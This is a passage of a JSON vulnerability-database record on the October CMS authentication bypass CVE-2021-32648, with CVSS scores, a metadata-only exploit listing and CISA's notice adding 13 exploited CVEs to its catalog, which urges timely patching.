"impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2021-09-01T15:58:00", "cpe": [], "id": "CVE-2021-32648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32648", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}], "githubexploit": [{"lastseen": "2022-03-23T21:27:28", "description": "# CVE-2021-32648\n\nPatch your code for October CMS Auth Bypass CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-20T09:28:13", "type": "githubexploit", "title": "Exploit for Improper Authentication in Octobercms October", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29487", "CVE-2021-32648"], "modified": "2022-01-20T09:30:12", "id": "FCAFCDD5-9440-5A5E-A5DD-51F88D1E4FC7", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "privateArea": 1}], "cisa": [{"lastseen": "2022-01-26T11:28:36", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2021-32648 | October CMS Improper Authentication | 2/1/2022 \nCVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022 \nCVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022 \nCVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022 \nCVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022 \nCVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022 \nCVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022 \nCVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022 \nCVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022 \nCVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13671", "CVE-2020-13927", "CVE-2020-14864", "CVE-2021-21315", "CVE-2021-21975", "CVE-2021-22991", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-32648", "CVE-2021-33766", "CVE-2021-40870"], "modified": "2022-01-25T00:00:00", "id": "CISA:D7385BDD2786721598A2135E182282C2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}